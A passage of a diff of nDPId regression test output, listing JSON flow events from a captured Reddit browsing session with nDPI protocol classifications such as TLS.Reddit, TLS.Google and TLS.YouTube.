{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1605291688611,"flow_last_seen":1605291688858,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7595,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1605291687642,"flow_last_seen":1605291687853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":36007,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605291688830,"flow_last_seen":1605291698440,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":18805,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} -00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":146,"flow_first_seen":1605291687485,"flow_last_seen":1605291690985,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":121491,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
-00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1605291688324,"flow_last_seen":1605291688572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6036,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291696948,"flow_last_seen":1605291697249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7617,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688336,"flow_last_seen":1605291688453,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4038,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":174,"flow_first_seen":1605291688831,"flow_last_seen":1605291698470,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3624,"flow_tot_l4_payload_len":123775,"flow_avg_l4_payload_len":711,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} 
-00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1605291684451,"flow_last_seen":1605291698602,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8332,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00732{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291684451,"flow_last_seen":1605291684592,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":4078,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 
-00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1605291687761,"flow_last_seen":1605291687902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5000,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1605291687933,"flow_last_seen":1605291688585,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":14745,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690926,"flow_last_seen":1605291691119,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1605291686985,"flow_last_seen":1605291690314,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2776,"flow_tot_l4_payload_len":41240,"flow_avg_l4_payload_len":564,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 
-00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291688712,"flow_last_seen":1605291688927,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5005,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":636,"flow_first_seen":1605291687931,"flow_last_seen":1605291698785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7248,"flow_tot_l4_payload_len":748553,"flow_avg_l4_payload_len":1176,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} 
-00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291687896,"flow_last_seen":1605291688326,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6703,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1605291690926,"flow_last_seen":1605291691154,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10872,"flow_tot_l4_payload_len":111125,"flow_avg_l4_payload_len":1068,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8555,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46812,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690926,"flow_last_seen":1605291691044,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8557,"flow_avg_l4_payload_len":316,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1605291686985,"flow_last_seen":1605291698522,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2333,"flow_tot_l4_payload_len":45370,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291690373,"flow_last_seen":1605291690520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5684,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291687934,"flow_last_seen":1605291688340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6623,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} +00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":847,"flow_first_seen":1605291684452,"flow_last_seen":1605291698703,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6245,"flow_tot_l4_payload_len":482020,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1605291688843,"flow_last_seen":1605291691232,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":69230,"flow_avg_l4_payload_len":607,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291684481,"flow_last_seen":1605291684654,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688843,"flow_last_seen":1605291689005,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1442,"flow_first_seen":1605291686035,"flow_last_seen":1605291696381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11528,"flow_tot_l4_payload_len":1922359,"flow_avg_l4_payload_len":1333,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686149,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686156,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} +00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
+00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 